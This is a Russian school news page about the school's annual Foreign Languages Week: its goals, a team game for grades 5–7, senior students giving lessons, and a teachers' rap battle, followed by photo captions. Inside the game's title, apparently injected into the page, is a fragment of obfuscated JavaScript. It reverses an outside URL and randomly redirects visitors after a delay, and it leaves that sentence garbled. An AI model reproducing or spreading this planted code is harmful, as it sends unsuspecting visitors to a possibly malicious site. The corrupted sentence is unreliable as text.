logo

Неделя иностранных языков

Внеклассная работа по иностранным языкам необходима для развития и поддержания интереса к изучению иностранных языков, для развития творческих способностей учащихся. Неделя иностранных языков, которая ежегодно проводится в нашей школе, даёт ребятам возможность на практике применить свои знания, независимо от их уровня, и поэтому поверить в свои силы в изучении иностранного языка.
Целями проведения Недели являются:
– усилить мотивацию к изучению иностранных языков,
– способствовать практическому владению речевой деятельностью,
– увеличивать активный языковой запас учащихся,
– стимулировать в целом их интеллектуальную и языковую активность,
– расширять общий кругозор школьников,
– повышать их культурный уровень,
– развивать творческие способности детей.
Главным принципом Недели иностранных языков является вовлечение учащихся всех параллелей, независимо от уровня их знаний иностранного языка, в события Недели, предлагая им задания и мероприятия посильного уровня.
Неделя иностранных языков началась с увлекательной игры «Game of toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tones» для учеников 5 и 6-7 классов. Учащимся были предложены различные задания на английском языке, задания по культуре стран изучаемых языков, динамичные спортивные состязания, а в финале команда-победитель получала главный приз — пиньяту, наполненную конфетами. Все команды сплотились и показали замечательные результаты!
Ученики 10dp и 11dp класса получили возможность проявить себя в качестве учителей английского, немецкого, испанского и китайского языков в группах 5, 6 и 7 классов. Костоева Зарема, Сергеева Даша, Фридман Элина, Исмаилов Тимур, Чернов Никита, Гордон Роберт, Буракова Настя и Горащенко Коля подготовили интересные, интерактивные уроки и приятно удивили своих младших товарищей.
Кульминацией недели иностранных языков стал рэп-баттл «Nice off», подготовленный преподавателями английского языка (Абкеримов Р.С., Скрипник В.С., Прайл Крис, Орландо Карлос). Учителям удалось создать невероятную атмосферу и зарядить коллег и учащихся положительными эмоциями на долгое время вперёд.



DSC_1752

DSC_1626

DSC_1595

DSC_1527

DSC_1524

DSC_1490

DSC_1468

DSC_1466

DSC_1376

DSC_1324

DSC_1279